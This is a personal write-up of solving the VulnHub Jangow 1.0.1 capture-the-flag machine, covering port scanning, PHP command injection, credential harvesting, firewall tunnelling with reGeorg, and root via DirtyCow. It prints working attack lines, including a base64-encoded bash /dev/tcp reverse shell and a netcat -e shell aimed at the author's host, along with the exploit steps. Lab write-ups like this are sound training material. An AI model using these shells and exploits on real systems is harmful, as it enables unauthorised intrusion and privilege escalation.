VulnHub Jangow 1.0.1 Walkthru

Getting Started

This is a walkthru of how I solved Jangow 1.0.1 from Vulnhub, released 04/11/2021. Its described as an easy ctf and gives a hint that enumeration is important. This is the second CTF challenge I’ve ever done, and my first writeup. How did I do? What would you have done differently?

Launching this image up in VirtualBox present its IP address in the console:

Port Enumeration

I started with a port scan using nmap. The -F parameter scans only the most common ports:

$ nmap -F -sV -sC 192.168.56.118
Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-23 17:16 CEST
Nmap scan report for 192.168.56.118
Host is up (0.00045s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds

We learn that this is Ubuntu box running vsftpd and apache. I’ll start a more thorough port scan in the background while I investigate these services:

$ nmap -sV -sC 192.168.56.118

Investigating FTP

Let’s check for anonymous ftp access:

$ ftp ftp://anonymous:anonymous@192.168.56.118/

Nope. Thats a dead-end for now.

Investigating HTTP

The web root just contains a site folder. Directory listings are enabled.

‘Site’ is just a empty web template. The only interesting thing is ‘Buscar’, which means search in Spanish so that might contain something dynamic:

This PHP script that returns nothing. Lets start some web recon in the background while we probe at it.

$ feroxbuster --url http://192.168.56.118/site/

Lets see if we can inject something into that busque.php script:

Too easy. We already have remote code execution as the www-data user. In fact, it works even without the semi-colon. This is not particularly realistic. Let’s continue our injection with cURL:

$ curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
js
wordpress

$ curl http://192.168.56.118/site/busque.php?buscar=cat+busque.php
<?php system($_GET['buscar']); ?>

$ curl http://192.168.56.118/site/busque.php?buscar=ls+wordpress
config.php
index.html

$ curl http://192.168.56.118/site/busque.php?buscar=cat+wordpress/config.php
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

We confirmed that all busque.php does is run our commands on the box. Now we find some creds in wordpress/config.php. I wonder if www-data has permission to get the user flag:

$ curl http://192.168.56.118/site/busque.php?buscar=ls+/home
jangow01

$ curl http://192.168.56.118/site/busque.php?buscar=ls+/home/jangow01
user.txt

$ curl http://192.168.56.118/site/busque.php?buscar=cat+/home/jangow01/user.txt
d41d8cd98f00b204e9800998ecf8427e

Ok we got the flag and a username!

Trying for a shell

Lets try to get a reverse shell. On the local machine:

$ nc -lvp 51337

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=nc -e /bin/bash 192.168.56.1 51337 2>&1"
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
	  [-P proxy_username] [-p source_port] [-q seconds] [-s source]
	  [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
	  [-x proxy_address[:port]] [destination] [port]

Ok we can’t use this version of netcat. At this point I tried a few other reverse shells from PayLoadAllTheThings but received no output. I guess special characters are messing things up. Let’s try base64 encoding it to get rid of them:

$ echo 'bash -i >& /dev/tcp/192.168.56.1/51337 0>&1'|base64 -w0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEvNTEzMzcgMD4mMQo=

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEvNTEzMzcgMD4mMQo=|base64 -d|bash"

This time instead of returning nothing, it hung. Hmmm… is there a firewall blocking outbound connections?

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:51337"
$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:80"
$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=curl 192.168.56.1:443"

Hang, hang, hang. Even ports 80 and 443 are blocked. I wonder if inbound connections are blocked too:

$ curl 192.168.56.118:51337
$ curl 192.168.56.118:443

More hangs. We are firewalled in both directions.

Setting up a web-based proxy server

We have RCE, but can’t get a shell in either direction. Maybe we can upload a web-based proxy server and use it to tunnel through the firewall. Enter reGeog:

https://github.com/sensepost/reGeorg

This tool consists of two parts. A script you run on the web server, and a local daemon. We could probably upload the script by base64 encoding it and piping it to a file but there is an easier way. Remember those creds we found?

$ ftp ftp://jangow01:abygurl69@192.168.56.118/
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> cd /tmp
250 Directory successfully changed.
ftp> put tunnel.nosocket.php
local: tunnel.nosocket.php remote: tunnel.nosocket.php
229 Entering Extended Passive Mode (|||30585|)
150 Ok to send data.
100% |*****************************************************************************************************************************************|  5974       31.82 MiB/s    00:00 ETA
226 Transfer complete.
5974 bytes sent in 00:00 (2.44 MiB/s)
ftp> chmod 777 tunnel.nosocket.php
200 SITE CHMOD command ok.
ftp> 

We didn’t have permission to upload anything to the web root, but we can dump our script in /tmp, then move it.

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=cp /tmp/tunnel.nosocket.php proxy.php 2>&1"

$ curl http://192.168.56.118/site/proxy.php
Georg says, 'All seems fine'

$ python2.7 reGeorgSocksProxy.py -u http://192.168.56.118/site/proxy.php

    
                     _____
  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

  willem@sensepost.com / @_w_m__
  sam@sensepost.com / @trowalts
  etienne@sensepost.com / @kamp_staaldraad
  
   
[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.56.118/site/proxy.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

Bind shell over the proxy tunnel

Now we need to run a bind shell on the box. We have file upload already so let’s not mess around with trying to upload stuff via php. I grabbed the perl shell from PayLoadAllTheThings’s Cheat Sheet, dumped it into a file, uploaded it into /home/jangow01 and chmod 777’d it:

$ curl http://192.168.56.118/site/busque.php --get --data-urlencode "buscar=bash /home/jangow01/perlshell.sh 2>&1"

This command hung, which means its listening. Now to connect via the proxy:

$ nc -v -xlocalhost:8888 -X5 localhost 51337
Connection to localhost 8906 port [tcp/*] succeeded!
bash: cannot set terminal process group (2726): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$

We now have a prompt on the box and can upgrade it to an interactive shell:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Getting root

This box is running Linux 4.4.0, vulnerable to DirtyCow. Upload this source file:

https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Compile it and run it:

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped

$ cat /root/proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709

Leave a comment!

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.